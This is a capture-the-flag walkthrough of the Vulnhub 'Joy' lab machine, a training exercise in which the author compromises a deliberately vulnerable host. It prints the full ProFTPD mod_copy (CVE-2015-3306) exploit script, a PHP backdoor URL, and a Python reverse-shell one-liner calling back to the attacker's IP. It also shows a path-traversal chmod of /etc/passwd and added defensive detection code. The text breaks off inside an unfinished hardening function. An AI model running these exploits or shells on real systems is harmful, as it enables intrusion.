Vulnhub Joy machine: detailed walkthrough

Joy

Author: jason_huawen

Basic machine information

Name: digitalworld.local: JOY

Address:

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                         

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:9a:9e:c2      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.254  08:00:27:e4:d2:fe      1      60  PCS Systemtechnik GmbH                      

Kali Linux's built-in Netdiscover tool identifies the target host's IP address as 192.168.56.254.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 05:46 EST
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00021s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA TOP PIPELINING UIDL AUTH-RESP-CODE RESP-CODES STLS SASL
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 LOGIN-REFERRALS ENABLE Pre-login IDLE have post-login listed capabilities OK STARTTLS LOGINDISABLEDA0001 more ID
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 ENABLE Pre-login IDLE LOGIN-REFERRALS have post-login listed AUTH=PLAINA0001 capabilities OK more ID
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP USER UIDL AUTH-RESP-CODE RESP-CODES PIPELINING SASL(PLAIN)
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h19m58s, deviation: 4h37m07s, median: 7h59m57s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2022-12-05T02:46:47+08:00
| smb2-time: 
|   date: 2022-12-04T18:46:48
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 The Good Tech Inc. FTP Server
Name (192.168.56.254:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23165|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> ls -alh
229 Entering Extended Passive Mode (|||46554|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
drwxrwxr-x   2 ftp      ftp          4.0k Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4.0k Jan 10  2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||35903|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4.0k Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||23286|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||39457|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4.0k Jan 10  2019 .
drwxr-x---   4 ftp      ftp          4.0k Jan  6  2019 ..
-rwxrwxr-x   1 ftp      ftp          1.9k Dec  4 18:48 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
226 Transfer complete
ftp> get reminder
local: reminder remote: reminder
229 Entering Extended Passive Mode (|||61399|)
150 Opening BINARY mode data connection for reminder (24 bytes)
100% |*********************************************************************************|    24       37.80 KiB/s    00:00 ETA
226 Transfer complete
24 bytes received in 00:00 (21.90 KiB/s)
ftp> get directory
local: directory remote: directory
229 Entering Extended Passive Mode (|||25671|)
150 Opening BINARY mode data connection for directory (1908 bytes)
100% |*********************************************************************************|  1908       90.98 MiB/s    00:00 ETA
226 Transfer complete
1908 bytes received in 00:00 (4.90 MiB/s)
ftp> get project_*
local: project_* remote: project_*
229 Entering Extended Passive Mode (|||22671|)
550 project_*: No such file or directory
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/04 05:53:24 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 302]
Progress: 219739 / 220561 (99.63%)===============================================================
2022/12/04 05:54:14 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254/ossec/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/04 05:54:43 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site                 (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README               (Status: 200) [Size: 2106]
/js                   (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/tmp                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE              (Status: 200) [Size: 35745]
Progress: 219775 / 220561 (99.64%)===============================================================
2022/12/04 05:55:34 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254/ossec/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
===============================================================
2022/12/04 05:56:09 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 13139]
/.html                (Status: 403) [Size: 300]
/.php                 (Status: 403) [Size: 299]
/img                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site                 (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README               (Status: 200) [Size: 2106]
/js                   (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/setup.sh             (Status: 200) [Size: 2471]
/tmp                  (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE              (Status: 200) [Size: 35745]
/.php                 (Status: 403) [Size: 299]
/.html                (Status: 403) [Size: 300]
Progress: 1101116 / 1102805 (99.85%)===============================================================
2022/12/04 06:00:32 Finished
===================================================

After scanning for directories and files and visiting each of them, none of them turned out to be exploitable.

Scan the UDP ports:

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sU --top-ports 50 192.168.56.254 -T4 -v         
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 06:07 EST
Initiating ARP Ping Scan at 06:07
Scanning 192.168.56.254 [1 port]
Completed ARP Ping Scan at 06:07, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:07
Completed Parallel DNS resolution of 1 host. at 06:07, 0.01s elapsed
Initiating UDP Scan at 06:07
Scanning localhost (192.168.56.254) [50 ports]
Increasing send delay for 192.168.56.254 from 0 to 50 due to max_successful_tryno increase to 5
Discovered open port 161/udp on 192.168.56.254
Discovered open port 123/udp on 192.168.56.254
Increasing send delay for 192.168.56.254 from 50 to 100 due to max_successful_tryno increase to 6
Discovered open port 137/udp on 192.168.56.254
Warning: 192.168.56.254 giving up on port because retransmission cap hit (6).
Completed UDP Scan at 06:08, 23.89s elapsed (50 total ports)
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00096s latency).

PORT      STATE         SERVICE
7/udp     open|filtered echo
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
80/udp    open|filtered http
111/udp   closed        rpcbind
123/udp   open          ntp
135/udp   closed        msrpc
136/udp   closed        profile
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open          snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
518/udp   open|filtered ntalk
520/udp   open|filtered route
593/udp   closed        http-rpc-epmap
626/udp   closed        serialnumberd
631/udp   open|filtered ipp
996/udp   open|filtered vsinet
997/udp   closed        maitrd
998/udp   closed        puparp
999/udp   open|filtered applix
1025/udp  open|filtered blackjack
1026/udp  closed        win-rpc
1027/udp  open|filtered unknown
1433/udp  open|filtered ms-sql-s
1434/udp  open|filtered ms-sql-m
1645/udp  closed        radius
1646/udp  closed        radacct
1701/udp  closed        L2TP
1812/udp  open|filtered radius
1900/udp  open|filtered upnp
2048/udp  closed        dls-monitor
2049/udp  closed        nfs
2222/udp  closed        msantipiracy
3283/udp  closed        netassistant
3456/udp  closed        IISrpc-or-vat
4500/udp  closed        nat-t-ike
5060/udp  closed        sip
5353/udp  open|filtered zeroconf
20031/udp open|filtered bakbonenetvault
32768/udp closed        omad
49152/udp closed        unknown
49153/udp closed        unknown
49154/udp closed        unknown
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
           Raw packets sent: 273 (16.867KB) | Rcvd: 37 (3.808KB)

The UDP scan shows that SNMP is open, but that is of little value here; the work still has to centre on FTP. The Nmap scan identified the service as ProFTPD but not its version. The `directory` file downloaded from FTP lists a version_control file whose contents are unknown, so let's see whether ProFTPD's copy (mod_copy) vulnerability can be used to fetch it:

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ telnet 192.168.56.254 21   
Trying 192.168.56.254...
Connected to 192.168.56.254.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
^Cquit
221 Goodbye.
Connection closed by foreign host.

Now connect to the server over FTP again and the version_control file is there; download it and view it locally:

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat version_control 
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

Now that the exact ProFTPD version is known, check whether it has any vulnerabilities:

Exploit code found:

https://www.exploit-db.com/exploits/36803

Download it locally:

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat 36803.py       
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
    print '\n Usage : exploit.py server directory cmd'
else:
        server = sys.argv[1] #Vulnerable Server
        directory = sys.argv[2] # Path accessible from web .....
        cmd = sys.argv[3] #PHP payload to be executed
        evil = '<?php system("' + cmd + '") ?>'
        s.connect((server, 21))
        s.recv(1024)
        print '[ + ] Connected to server [ + ] \n'
        s.send('site cpfr /etc/passwd')
        s.recv(1024)
        s.send('site cpto ' + evil)
        s.recv(1024)
        s.send('site cpfr /proc/self/fd/3')
        s.recv(1024)
        s.send('site cpto ' + directory + 'infogen.php')
        s.recv(1024)
        s.close()
        print '[ + ] Payload sended [ + ]\n'
        print '[ + ] Executing Payload [ + ]\n'
        r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
        if (r.status_code == 200):
                print '[ * ] Payload Executed Succesfully [ * ]'
        else:
                print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'

print '\n http://infogen.al/'                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ python2 36803.py 192.168.56.254 /ossec id
  ___        __        ____                 _    _  
 |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
 |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|


[ + ] Connected to server [ + ] 

id
^CTraceback (most recent call last):
  File "36803.py", line 31, in <module>
    s.recv(1024)
KeyboardInterrupt

Running it produced no result.

Found another exploit:

https://github.com/t0kx/exploit-CVE-2015-3306
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ python exploit.py --host 192.168.56.254 --port 21 --path "/var/www/tryingharderisjoy"              
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.254:21
[+] Target exploited, acessing shell at http://192.168.56.254/backdoor.php
[+] Running whoami: www-data
[+] Done
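From the defender's side, the manual SITE CPFR/CPTO exchange above and both exploit scripts leave the same trace in the FTP command log. The following Python example is added here and is not part of the original post: it parses a constructed ProFTPD-style command log (the line format, the FTP root /home/ftp and the web root /var/www are assumptions) and flags copies issued before login, sources outside the FTP root or under /proc/self/fd, and destinations inside a web root.

```python
import posixpath
import re
from dataclasses import dataclass

# Assumed line shape (constructed for this example, not a ProFTPD default):
#   <client-ip> [<timestamp>] "<raw FTP command line>"
LINE_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<cmd>[^"]*)"$')

# Constructed log: the pre-login copies seen on this box, then a benign
# authenticated copy inside the FTP tree from another client.
SAMPLE_LOG = """\
192.168.56.206 [04/Dec/2022:06:09:58 -0500] "SITE CPFR /home/patrick/version_control"
192.168.56.206 [04/Dec/2022:06:09:59 -0500] "SITE CPTO /home/ftp/upload/version_control"
192.168.56.206 [04/Dec/2022:06:12:10 -0500] "SITE CPFR /proc/self/fd/3"
192.168.56.206 [04/Dec/2022:06:12:11 -0500] "SITE CPTO /var/www/tryingharderisjoy/backdoor.php"
10.10.10.7 [04/Dec/2022:06:15:00 -0500] "USER patrick"
10.10.10.7 [04/Dec/2022:06:15:01 -0500] "LIST"
10.10.10.7 [04/Dec/2022:06:15:20 -0500] "SITE CPFR /home/ftp/upload/report.txt"
10.10.10.7 [04/Dec/2022:06:15:21 -0500] "SITE CPTO /home/ftp/download/report.txt"
"""


@dataclass
class Finding:
    client: str
    timestamp: str
    rule: str
    command: str


def _under(path: str, root: str) -> bool:
    """True if path is root itself or lies below it; '..' segments are normalised first."""
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def detect_mod_copy_abuse(lines, ftp_root="/home/ftp", web_roots=("/var/www",)):
    """Return a Finding for each suspicious SITE CPFR/CPTO command.

    Rules: copy used before any USER command (the unauthenticated case of
    CVE-2015-3306), copy used by an anonymous login, CPFR source under
    /proc/self/fd (the staging trick used by 36803.py) or outside the FTP root,
    CPTO destination under a web root / ending in a PHP extension, or outside
    the FTP root.
    """
    user_by_client = {}
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # lines in other formats are skipped, not treated as errors
        ip, ts, cmd = m.group("ip"), m.group("ts"), m.group("cmd")
        parts = cmd.split(None, 2)
        verb = parts[0].upper() if parts else ""
        if verb == "USER" and len(parts) > 1:
            user_by_client[ip] = parts[1].lower()
            continue
        if verb != "SITE" or len(parts) < 3 or parts[1].upper() not in ("CPFR", "CPTO"):
            continue
        sub, arg = parts[1].upper(), parts[2].strip()
        user = user_by_client.get(ip)
        if user is None:
            findings.append(Finding(ip, ts, "mod_copy-before-login", cmd))
        elif user in ("anonymous", "ftp"):
            findings.append(Finding(ip, ts, "mod_copy-by-anonymous", cmd))
        if sub == "CPFR":
            if arg.startswith("/proc/self/fd/"):
                findings.append(Finding(ip, ts, "cpfr-proc-fd-staging", cmd))
            elif not _under(arg, ftp_root):
                findings.append(Finding(ip, ts, "cpfr-outside-ftp-root", cmd))
        else:
            if any(_under(arg, w) for w in web_roots) or arg.lower().endswith((".php", ".phtml")):
                findings.append(Finding(ip, ts, "cpto-into-web-root-or-script", cmd))
            elif not _under(arg, ftp_root):
                findings.append(Finding(ip, ts, "cpto-outside-ftp-root", cmd))
    return findings


if __name__ == "__main__":
    for f in detect_mod_copy_abuse(SAMPLE_LOG.splitlines()):
        print(f"{f.timestamp} {f.client} {f.rule}: {f.command}")
```

On the constructed log the patrick session produces no findings, while every copy from 192.168.56.206 is flagged at least once.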

Visit:

http://192.168.56.254/backdoor.php?cmd=id

The command output is returned successfully; next, try to obtain a reverse shell:

Visit:

http://192.168.56.254/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27

The reverse shell connects back to Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ sudo nc -nlvp 5555                                
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 36146
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
backdoor.php  ossec
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -alh
ls -alh
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan  6  2019 .
drwxr-xr-x 3 www-data www-data 4.0K Dec  5 03:31 ..
-rw-r--r-- 1 www-data www-data   92 Jul 19  2016 .hgtags
-rw-r--r-- 1 www-data www-data  262 Dec 28  2018 .htaccess
-rw-r--r-- 1 www-data www-data   44 Dec 28  2018 .htpasswd
-rwxr-xr-x 1 www-data www-data  317 Jul 19  2016 CONTRIB
-rw-r--r-- 1 www-data www-data  35K Jul 19  2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19  2016 README
-rw-r--r-- 1 www-data www-data  923 Jul 19  2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19  2016 css
-rw-r--r-- 1 www-data www-data  218 Jul 19  2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19  2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19  2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19  2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28  2018 lib
-rw-r--r-- 1 www-data www-data  462 Jul 19  2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data  134 Jan  6  2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19  2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28  2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28  2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat ossec_conf.php
cat ossec_conf.php

www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis

su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis

su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - patrick
su - patrick
Password: apollo098765

patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$ 

Privilege escalation

patrick@JOY:~/.config$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
    (ALL) NOPASSWD: /home/patrick/script/test

patrick@JOY:/tmp$ sudo -u root /home/patrick/script/test
sudo -u root /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../../../../etc/passwd
../../../../../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rwxrwxrwx 1 root root 2.5K Jan 28  2019 /etc/passwd
patrick@JOY:/tmp$ 
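The script at /home/patrick/script/test takes a file name and a mode and runs chmod as root without checking that the file really lies inside its own directory, which is why the `../../../../../../../etc/passwd` answer works. The following Python example is added here and is not the machine's script (the version_control note says that one is bash): it shows the containment check the script is missing, exercised on constructed temporary files, and the names `safe_chmod`, `resolve_inside` and `demo` are the example's own.

```python
import os
import re
import stat
import tempfile

MODE_RE = re.compile(r"^[0-7]{3,4}$")   # accept a plain octal mode only, never chmod flags


class RejectedPath(ValueError):
    """Requested target is not a regular file inside the allowed directory."""


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Canonicalise base_dir/user_path and refuse anything that escapes base_dir.

    realpath() collapses '..' and follows symlinks, so '../../../etc/passwd' and a
    symlink planted inside base_dir that points outside it are both rejected.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if target == base or os.path.commonpath([base, target]) != base:
        raise RejectedPath(f"{user_path!r} resolves to {target}, outside {base}")
    if not os.path.isfile(target):
        raise RejectedPath(f"{user_path!r} is not a regular file inside {base}")
    return target


def safe_chmod(base_dir: str, user_path: str, mode_str: str) -> str:
    """The hardened core of the 'test' script: validate the mode, contain the path, chmod."""
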